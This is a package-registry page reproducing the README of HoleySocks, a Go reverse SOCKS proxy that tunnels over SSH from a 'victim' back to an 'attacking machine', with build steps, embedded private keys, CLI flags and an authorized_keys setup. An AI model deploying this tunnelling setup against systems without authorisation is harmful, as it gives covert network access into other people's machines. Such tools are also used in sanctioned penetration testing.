Security News
Crates.io Implements Trusted Publishing Support
Crates.io adds Trusted Publishing support, enabling secure GitHub Actions-based crate releases without long-lived API tokens.
By Sarah Gooding - Jul 16, 2025
You're Invited:Meet the Socket Team at BlackHat and DEF CON in Las Vegas, Aug 4-6.RSVP →
github.com/attackgithub/holeysocks
- Version published
- Created
HoleySocks
A simple cross-platform reverse socks proxy.
Getting Started
As a module
import github.com/audibleblink/HoleySocks/pkg/holeysocks
func main() {
//error handling removed for brevity
config := holeysocks.MainConfig{}
configBytes, _ := ioutil.OpenFile("ssh.json")
json.Unmarshal(configBytes, &config)
sshKey, _ := ioutil.OpenFile("id_ed25519")
config.SSH.SetKey(sshKey)
holeysocks.DarnSocks(config)
// #DarnSocks runs two goroutines then returns so we have to keep main from returning
select {}
}
As a standalone binary
It's possible to embed all the required parameters to start and forward
the socks server with SSH so that cli flags are not needed.
Do this by creating config/ssh.json and using the -X main.static=1 ldflag.
# needed for embedding configs in the binary
go get -u github.com/gobuffalo/packr/...
go get github.com/audibleblink/HoleySocks/...
cd $GOPATH/src/github.com/audibleblink/HoleySocks
... edit configs/ssh.json ...
make depends
make
To compile a generic binary without embedded configs, remote the -X ldflag from the Makefile or
just go build as necessary. You should get a binary that's configurable with these flags:
Usage of binaries/linux/HoleySocks64:
-sshuser string
[REQ] SSH user ong the host
-sshhost string
[REQ] SSH host with which to connect
-pkey string
[REQ] File path for private key
-rport int
SSH host port on which to bind the local SOCKS server (default 1080)
-socksport int
Bind port of the SOCKS server (default 1080)
-sshport int
SSH host destination port (default 22)
Read the Makefile for more options
CAUTION The generated private keys are embedded into the binary to allow for the reverse port forwarding without interaction. Follow the instructions below.
Before running the generated binaries, you'll need a user on your attacking machine for receiving the reverse ssh connection that forwards the socks proxy from the victim.
Once that user has been created, (with a homedir and /bin/false shell), append the generated pubkey in your authorized_keys file on the attacking machine.
Do so with the following prefixes:
# if you're forwarding port 1080
FROM=<victim_ip_or_host> NO-X11-FORWARDING,PERMITOPEN="0.0.0.0:1080" ssh-ed25519 AAAAC3......
The Makefile should generate the needed commands and entry for you when you run make depends
FAQs
Unknown package
Package last updated on 05 Feb 2019
Did you know?
Socket for GitHub automatically highlights issues in each pull request and monitors the health of all your open source dependencies. Discover the contents of your packages and block harmful activity before you install or update your dependencies.
Related posts
Research
/Security News
Tracking Protestware Spread: 28 npm Packages Affected by Payload Targeting Russian-Language Users
Undocumented protestware found in 28 npm packages disrupts UI for Russian-language users visiting Russian and Belarusian domains.
By Olivia Brown - Jul 15, 2025
Research
/Security News
Contagious Interview Campaign Escalates With 67 Malicious npm Packages and New Malware Loader
North Korean threat actors deploy 67 malicious npm packages using the newly discovered XORIndex malware loader.
By Kirill Boychenko - Jul 14, 2025